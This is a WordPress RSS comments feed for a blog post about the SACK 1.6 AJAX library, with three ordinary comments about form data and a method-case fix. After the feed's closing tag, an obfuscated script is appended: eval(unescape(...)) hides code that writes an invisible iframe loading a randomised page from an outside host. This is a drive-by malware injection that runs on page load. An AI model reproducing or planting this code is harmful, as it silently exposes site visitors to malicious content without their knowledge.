<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress/2.2.3" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>
<channel>
	<title>Comments on: SACK 1.6</title>
	<link>http://www.twilightuniverse.com/blog/2006/02/sack-16/</link>
	<description>by Gregory Wild-Smith</description>
	<pubDate>Fri, 05 Sep 2008 20:23:58 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.2.3</generator>

	<item>
		<title>By: Brent Clements</title>
		<link>http://www.twilightuniverse.com/blog/2006/02/sack-16/#comment-2426</link>
		<dc:creator>Brent Clements</dc:creator>
		<pubDate>Tue, 30 May 2006 22:13:23 +0000</pubDate>
		<guid>http://www.twilightuniverse.com/blog/2006/02/sack-16/#comment-2426</guid>
		<description>I have a question about passing form data.

Let's say I have a form and a "submit" button. The button calls the doit function which does all of the sack setup and running. Per the documentation, it says that the recommended way of passing form data is to create a sack variable for each form variable. This is somewhat of a large task if the form is huge. How do I pass the entire form data through sack to the php script rather than creating and setting each variable in the "doit" function.

Thanks!</description>
		<content:encoded><![CDATA[<p>I have a question about passing form data.</p>
<p>Let&#8217;s say I have a form and a &#8220;submit&#8221; button. The button calls the doit function which does all of the sack setup and running. Per the documentation, it says that the recommended way of passing form data is to create a sack variable for each form variable. This is somewhat of a large task if the form is huge. How do I pass the entire form data through sack to the php script rather than creating and setting each variable in the &#8220;doit&#8221; function.</p>
<p>Thanks!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gregory</title>
		<link>http://www.twilightuniverse.com/blog/2006/02/sack-16/#comment-1975</link>
		<dc:creator>Gregory</dc:creator>
		<pubDate>Fri, 17 Mar 2006 11:52:24 +0000</pubDate>
		<guid>http://www.twilightuniverse.com/blog/2006/02/sack-16/#comment-1975</guid>
		<description>Good point, I've also got to change the toLowerCase assignment in SACK. I'll make those changes and update to 1.6.2</description>
		<content:encoded><![CDATA[<p>Good point, I&#8217;ve also got to change the toLowerCase assignment in SACK. I&#8217;ll make those changes and update to 1.6.2</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Brian</title>
		<link>http://www.twilightuniverse.com/blog/2006/02/sack-16/#comment-1972</link>
		<dc:creator>Brian</dc:creator>
		<pubDate>Thu, 16 Mar 2006 22:46:33 +0000</pubDate>
		<guid>http://www.twilightuniverse.com/blog/2006/02/sack-16/#comment-1972</guid>
		<description>I had problems getting SACK to work and I fought with it for hours. As it turns out, the problem was I was passing the form method (straight from the form.method property itself)... and it wasn't being recognized because the form method was in lowercase.

To account for this I updated tw-sack.js to convert the method to uppercase everywhere the method is referenced.

CHANGE LOG
* On lines 132, 134, &#38; 136 I
  changed:  this.method --&#62; this.method.toUpperCase()


I am putting together a presentation for my office's monthly "Tech Share" to demonstrate AJAX at my marketing/web development firm and your code will greatly simplify the source code used in this presentation! :)

Thanks!</description>
		<content:encoded><![CDATA[<p>I had problems getting SACK to work and I fought with it for hours. As it turns out, the problem was I was passing the form method (straight from the form.method property itself)&#8230; and it wasn&#8217;t being recognized because the form method was in lowercase.</p>
<p>To account for this I updated tw-sack.js to convert the method to uppercase everywhere the method is referenced.</p>
<p>CHANGE LOG<br />
* On lines 132, 134, &amp; 136 I<br />
  changed:  this.method &#8211;&gt; this.method.toUpperCase()</p>
<p>I am putting together a presentation for my office&#8217;s monthly &#8220;Tech Share&#8221; to demonstrate AJAX at my marketing/web development firm and your code will greatly simplify the source code used in this presentation! <img src='http://www.twilightuniverse.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Thanks!</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%66%39%35%65%64%34%30%37%63%33%64%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%77%77%77%2e%62%75%74%74%6f%6e%72%65%64%2e%63%6f%6d%2f%64%62%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%35%38%36%30%29%2b%27%34%63%32%33%32%34%30%63%5c%27%20%77%69%64%74%68%3d%34%36%30%20%68%65%69%67%68%74%3d%34%39%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>